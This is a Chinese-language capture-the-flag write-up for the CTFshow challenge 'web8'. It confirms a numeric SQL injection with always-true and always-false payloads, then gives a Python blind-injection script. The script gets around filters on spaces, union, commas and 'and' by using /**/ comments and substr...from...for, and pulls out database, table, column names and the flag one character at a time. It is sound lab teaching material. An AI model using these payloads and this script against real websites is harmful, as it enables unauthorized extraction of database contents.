CTFshow-web-wbe8
经过一系列payload的尝试后,发现本题过滤了空格、union、and、逗号等
打开靶场,显示如下
首先确定注入点,输入以下payload使SQL恒成立
?id=-1/**/or/**/true#
由于SQL恒成立,数据库将查询出表中的所有内容,并返回到前端,显示如下
输入以下payload,使SQL恒不成立
?id=-1/**/or/**/false#
由于SQL恒不成立,数据库查询不到任何数据,从而导致页面显示为空,显示如下
由上可知该页面存在SQL注入漏洞,且类型为数值型注入
经过一系列payload的尝试后,发现本题过滤了空格、union、and、逗号等,这也意味着无法使用联合查询了,那么此时就需要我们编写脚本来解决
import requests
url = 'http://42663f6e-29cf-493e-9d72-80872db16864.challenge.ctf.show/index.php?id=-1/**/or/**/'
name = ''
# 循环100次( 循环次数按照返回的字符串长度自定义)
for i in range(1, 80):
# 获取当前使用的数据库
# payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'
# 获取当前数据库的所有表
# payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'
# 获取flag表的字段
# payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d'
# 获取flag表的数据
payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d'
count = 0
print('正在获取第 %d 个字符' % i)
# 截取SQL查询结果的每个字符, 并判断字符内容
for j in range(31, 128):
result = requests.get(url + payload % (i, j))
if 'If' in result.text:
name += chr(j)
print('数据库名/表名/字段名/数据: %s' % name)
break
# 如果某个字符不存在,则停止程序
count += 1
if count >= (128 - 31):
exit()
代码跑一会,flag出现